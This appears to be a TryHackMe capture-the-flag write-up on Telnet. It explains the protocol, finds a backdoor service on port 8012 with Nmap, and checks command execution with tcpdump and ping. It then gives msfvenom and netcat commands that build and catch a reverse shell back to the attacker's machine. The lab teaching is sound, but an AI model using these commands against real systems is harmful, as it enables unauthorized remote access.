THM – Network Services – Telnet – Part 5
Last Updated on January 25, 2022 by aghanim
Table Of Contents
Understanding telnet
What is telnet?
Telnet is an application protocol which allows you, with the use of telnet client, to connect to and execute commands on a remote machine that’s hosting a telnet server.
The telnet client will establish a connection with the server. The client will then become a virtual terminal – allow you to interact with the remote host.
Replacement
Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.
How does Telnet work?
The user connects to the server by using the Telnet protocol, which means entering “telnet” into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the follow syntax:
Telnet IP PORT The lack of what, means that all Telnet communication is in plaintext? Encryption
Enumerating Telnet
Use Nmap to scan for open ports and services on the target machine.
How many ports open on the machine? One
What port is that? 8012 Telnet is assigned to a non-standard port.
Based on the title returned to us, what do we think this port could be used for? A backdoor (SKIDY’s BACKDOOR)
Who could it belong to? Skidy
Exploiting telnet
Telnet, being a protocol, is in and of itself insecure for its lack of encryption. It sends all communication over plaintext and has poor access control. There are CVE’s for Telnet client and server systems. A CVE, short for common vulnerability and exposures, is a list of public disclosed computer security flaws.
You are far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow us to exploit it.
Method breakdown
From our enumeration we know:
- There is a poorly hidden telnet service running on the machine.
- The service itself is marked “backdoor.”
- We have possible username of “SKDY” implicated.
Connecting to telnet
Connect to telnet using the command telnet IP PORT
What is a reverse shell?
A “shell” can simply be described as a piece of code or program which can be used to gain code or command execution on a device.
A reverse shell is a type of shell in which the target machine communcates back to the attacking machine.
The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.
Connect to this telnet port. What welcome message do we receive? SKIDY’s backdoor
When executing commands, do we get a return on any input into the telnet session? No
Let’s check to see if what we’re typing is being executed as a system command.
Start a tcpdump listener on your local machine.
sudo tcpdump ip proto \\icmp -i eth0 
Use command ping local THM ip –c 1. Do we receive any pings? YES
This means we’re able to execute system commands AND that we are able to reach our local machine.
We’re going to generate a reverse shell payload using msfvenom. This will generate and encode netcat reverse shell for us. Syntax:
msfvenom -p cmd/unix/reverse_netcat lhost=local_IP lport=4444 R-p = payload
lhost = our local host ip
lport = the port to listen on (this is the port on your machine)
R= export the payload in raw format
Payload is generated. Now start a netcat listener on our local machine. We use this command:
nc -lvp 4444Now that’s running, copy and paste our msfvenom payload into the telnet session and run it as a command.
Catch the flag!
